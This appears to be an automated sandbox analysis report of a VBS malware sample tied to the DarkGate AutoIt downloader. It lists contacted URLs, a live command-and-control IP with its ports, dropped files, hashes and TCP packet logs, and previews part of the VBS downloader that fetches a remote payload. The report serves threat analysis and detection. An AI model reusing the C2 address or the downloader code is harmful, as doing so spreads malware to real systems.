http://94.228.169.143:2351pace	bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://94.228.169.143:2351/msibpzszuqiqb	bpzs.exe, 00000005.00000002.383511096.000001CC77550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	false		high
https://curl.haxx.se/docs/http-cookies.html	bpzs.exe, bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr	false		high
https://curl.haxx.se/docs/http-cookies.html#	bpzs.exe	false		high
http://darkgate.comU	Autoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.228.169.143:2351cm	bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://94.228.169.143:2351temkw	bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://curl.haxx.se/P	bpzs.exe, 00000004.00000000.366979328.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375677782.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr	false		high
https://go.microso	Autoit3.exe	false	Avira URL Cloud: safe	unknown
http://go.micr	Autoit3.exe	false	Avira URL Cloud: safe	unknown
https://curl.haxx.se/docs/sslcerts.htmlcurl	bpzs.exe	false		high
https://curl.haxx.se/docs/sslcerts.html	bpzs.exe, bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr	false		high
https://curl.haxx.se/docs/copyright.htmlD	bpzs.exe, 00000004.00000000.366979328.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375677782.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr	false		high
http://94.228.169.143:2351/F	wscript.exe, 00000001.00000003.366588675.00000185DFE2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.228.169.143:2341/msibpzszuqi	bpzs.exe, 00000005.00000002.383511096.000001CC7755B000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://94.228.169.143:2351/bpzszuqi3?	wscript.exe, 00000001.00000002.366889695.00000185E1BA0000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://94.228.169.143:2351/tem	bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://94.228.169.143:2351O	bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://curl.haxx.se/docs/copyright.html	bpzs.exe	false		high
http://94.228.169.143:2351tem	bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://curl.haxx.se/	bpzs.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.228.169.143	unknown	Russian Federation		49245	SSERVICE-ASRU	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1313188
Start date and time:	2023-09-23 08:01:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	1.vbs
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@10/5@0/1
EGA Information:	Successful, ratio: 50%
HDC Information:	Failed
HCA Information:	Successful, ratio: 95% Number of executed functions: 51 Number of non-executed functions: 251
Cookbook Comments:	Found application associated with file extension: .vbs Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Execution Graph export aborted for target Autoit3.exe, PID 6116 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:02:02	API Interceptor	2x Sleep call for process: wscript.exe modified

Process:	C:\bpzs\bpzs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 3%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\bpzs\bpzs.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	424448
Entropy (8bit):	6.424280535341311
Encrypted:	false
SSDEEP:	12288:dgyHCwjz3TyXFuMGvt8EGuV6NHGJnE1PpkRS:dgyHCwjz3CFvUt8EGk/RS
MD5:	BDEBD2FC4927DA00EEA263AF9CF8F7ED
SHA1:	384CCB2CF4B457DA554EE9100BE26FC332155C56
SHA-256:	04AA05D63E3639F90995AFC0E635DAD45E57AFC858A88AC10EDE7C984043C781
SHA-512:	39F32F238936488D8D174AA6CE7A91948DF98C3FFC67203B8C04546EC187C91F33D8A90A9EB46832D0924C98D7F01A078C6195DFC44E029F74392976B07D5786
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,k3.h.]Vh.]Vh.]V...Vc.]V.h^Wa.]V.hXWu.]V.hYWz.]Var.V(.]V.h\Wo.]Vh.\V..]V.iUW..]V.i.Vi.]Vh..Vi.]V.i_Wi.]VRichh.]V........PE..d...TZ.Z.........."...........................@..........................................`.................................................<>...............p...................... ..T............................ ...............................................text...p........................... ..`.rdata..............................@..@.data...h....`.......D..............@....pdata.......p... ...F..............@..@.rsrc................f..............@..@.reloc...............l..............@..B........................................................................................................................................................................................................................................................

C:\bpzs\szkzjr.au3

Download File

Process:	C:\bpzs\bpzs.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	modified
Size (bytes):	930759
Entropy (8bit):	6.1368906225930795
Encrypted:	false
SSDEEP:	12288:PZWrNpQ6hkQT7ztyJ2ZqRGaQ7lihLvIat6/WuATZZXTuADb2l4tXWIXSPH/O+:PMDQ6h97tyJAUGaElGX6e7ny6z+H/X
MD5:	0EA7D1A7AD1B24835CA0B2FC6C51C15A
SHA1:	C470650DB0B249737B5CF84854292BA0B7EC68F7
SHA-256:	F9E6958800B576B94C26FD16691CA8E1CA7BDA7A0ABF0A8657D7CB0EB9A696DE
SHA-512:	1F3D5738E84A955A053DB7AC2C78E4A08154C0022F7D5E130BDCE5C41CEF25692D2E15A0FE80E641E4DED1308EDE5673D1FB7635F5FC7BEBE887A239201D4A7B
Malicious:	false
Reputation:	low
Preview:	KHeVRNjfoJmVTEHLrUaIriDtmrZcNXgcaBwWefZHWdzlqtBlaJbQyFKiNwWzzttiTofwoXrVYbTIKIOKyDcmLvrQBnFsIKPKUXLgsSpYeXGoxAamtFTHWBDNYahuskRQmiKjzIBeamucQPcDSwhhimhEDVhnuTfuDfvjiDsMxxhSKmNjFrusMgyhRnBHtFqYdCemfeLFjkoFUslkPedpqhEwmxIfIftQvSSSpdnDWhGeSBHAhdyzLBgLqZoluUoURWMbaJiJzcrfTWsJSoRThTvuEuAzyrjTcqIiNvtmIOZuXFQZInoTYgwgHqSsCFvhpdvhrgsMmlCFVtJuQgOrSzMMZwmmcLuOrTIqQWqTdtsvpXKEfDmEOCDnnCWAjBKBxXczAsbAYqhtwQNWOUwtVkQXcBIyTKcVwgZSZkYOPledvqVCIWaWMIYnWqyvULreDQTigFjXwpJXfErjchCVZBlRDVSBKVBYJYXBbcwCNRRAgHtsNCzyJHrBEvIbCwOggitDfqdnInUgSpxmiLjidmNvIahayotTMAjrYBdafazixjkMfRSbJSDLxXWEnnNkTLoqDigUYHOWRPtyXHGCrsyVIEeNyZxQxfAAdZBmlNjJLwRLFyAIeWSJZoaCuXkfQADpVgiDSdEHAkFzylvNmgJUjDAThwRjWucDRZGEPsnYweTzyuhJwOFFWYPHCDsTkOxHOsglfySPASXhcbsMAdWfcjyKloTJEmhobsAFMrujwhnDgOGJEACTnTBSDuIRCZvLdsodMZqjNtvElTxKcWaEsTqRLygmbOvGJhChiyxMMQgJoeixEACfhdGtEYQADVjiUPfDdaaRxFngPPacfMaDxuEgSixagrJTbKroAPDpIGRQQYhcPwRleUOKXfQLnCLRIGrwEjhbZHbvTgDzfMjFVJgIfNVvaEcAGFNsvDfOMmelZtmQNhQsPXXBoRRAVgoTabYEfwnpbSypLuWYNxgwFXYPkWShctUqkHWV

\Device\ConDrv

Download File

Process:	C:\bpzs\bpzs.exe
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	557
Entropy (8bit):	3.3684726192231254
Encrypted:	false
SSDEEP:	12:Vz6ykymUexb1U9cZVvSRCN+ZNVuhNFsVwYAZ:HkyH+bJrqRxrVwYAZ
MD5:	CC9BBF2639EE7C9CAC70F2083D151DD7
SHA1:	8E1548A0B16F57BD3F6070803A6610992126EF92
SHA-256:	7AB11FB093E82E6CDECF73E6C6F3291765A50EE5100503BE410E57D141023DF4
SHA-512:	6A839C05026EC3D807ACE2325BC3DF5B372222FC4FAF9B921AEDF2DD3F86E3A7145786DB42CCE8D4FB94A5DC0217B38CFF8D6FDADE91D3050139B01E53504A95
Malicious:	false
Reputation:	low
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 908k 0 3858 0 0 3858 0 0:04:01 --:--:-- 0:04:01 5872. 16 908k 16 145k 0 0 145k 0 0:00:06 0:00:01 0:00:05 89220. 38 908k 38 347k 0 0 173k 0 0:00:05 0:00:02 0:00:03 119k.100 908k 100 908k 0 0 302k 0 0:00:03 0:00:03 --:--:-- 255k..

Static File Info

General

File type:	data
Entropy (8bit):	3.129280035733884
TrID:
File name:	1.vbs
File size:	3'792 bytes
MD5:	317f213abccd88f7b240063e2bf9995d
SHA1:	66e0867a6f86fe25cf6773e58a8ff9ebb34fa36e
SHA256:	82e5409032e3d8d85390982fe99a86aa9f313f3c7b68c1e3fb4541d81fe9e24a
SHA512:	f52e6bd8ce2ea57572f11ba4aa2eac8c5ede8115da9732861361a14d4c89d032527f8e74995ffa7bf8585758545d242484d4db5b38674667d00dd9f1a85f5d08
SSDEEP:	24:Te9j+Pz0xr+QhKF6tkta+s6OD56SdsO9QZPXQnXngboF3ztzqMKJOIZytANYL4:T6T+D4kU36OD5BUyXg8ptzWJOIZyaYL
TLSH:	FA71D8BB42CC0192D9E623F2000735F265BEC034F258D271F0BC83A027172ACE1D81B9
File Content Preview:	qcfrjgeqtf = "Shell.Application"..sgaqwhqlaeth = "cmd"..if sgaqwhqlaeth = "a" then..MsgBox "Libr"..end if....ejkmjmkhqq="http://94.228.169.143:2351/bpzszuqi"..ymhezvoguki="WINHTTP.WinHTTPRequest.5.1"..if sgaqwhqlaeth = "a" then..MsgBox "Libr"..end if.....

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
94.228.169.143192.168.2.32351497132048098 09/23/23-08:02:03.355684	TCP	2048098	ET TROJAN DarkGate AutoIt Downloader	2351	49713	94.228.169.143	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 23, 2023 08:02:02.677184105 CEST	49713	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:03.005805016 CEST	2351	49713	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:03.006094933 CEST	49713	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:03.007694960 CEST	49713	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:03.355653048 CEST	2351	49713	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:03.355684042 CEST	2351	49713	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:03.355703115 CEST	2351	49713	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:03.355977058 CEST	49713	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:03.355977058 CEST	49713	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:03.356231928 CEST	49713	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:03.684355021 CEST	2351	49713	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:03.842300892 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.163933992 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.164213896 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.164887905 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.489535093 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489603996 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489641905 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489681959 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489700079 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.489720106 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489752054 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.489761114 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489799023 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489808083 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.489836931 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489875078 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489886999 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.489912033 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.489953995 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.811621904 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.811691999 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.811728954 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.811767101 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.811774015 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.811810017 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.811846018 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.811851978 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.811889887 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.811899900 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.811928034 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.811965942 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.811971903 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.812001944 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812040091 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812052965 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.812076092 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812112093 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812124968 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.812148094 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812184095 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812191010 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.812221050 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812258005 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812262058 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.812294960 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812333107 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:04.812340975 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:04.867217064 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.134026051 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134094000 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134131908 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134171009 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134176970 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.134212971 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134234905 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.134263992 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134300947 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134308100 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.134341955 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134378910 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134393930 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.134417057 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134454012 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134541035 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.134674072 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134742975 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134774923 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.134855986 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134941101 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.134959936 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.134996891 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135034084 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135039091 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.135104895 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135143995 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135152102 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.135211945 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135256052 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.135324001 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135399103 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135436058 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135446072 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.135529041 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135574102 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.135592937 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135684013 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.135730982 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.135790110 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136018038 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136068106 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.136082888 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136197090 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136241913 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.136270046 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136594057 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136631966 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136642933 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.136672974 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136713982 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.136740923 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136809111 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.136852026 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.188875914 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.188942909 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.189013004 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.456074953 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456145048 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456187010 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456209898 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.456223965 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456267118 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456270933 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.456393003 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456432104 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456444979 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.456546068 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456587076 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456602097 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.456625938 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456664085 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456672907 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.456701994 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456746101 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.456770897 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456870079 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456922054 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.456938982 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.456975937 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457017899 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.457043886 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457110882 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457161903 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.457217932 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457258940 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457303047 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.457326889 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457365990 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457408905 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.457433939 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457470894 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457506895 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457514048 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.457577944 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457617044 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457623005 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.457684994 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457741022 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.457756042 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457859993 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457907915 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.457947016 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.457989931 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458024979 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458033085 CEST	49714	2351	192.168.2.3	94.228.169.143
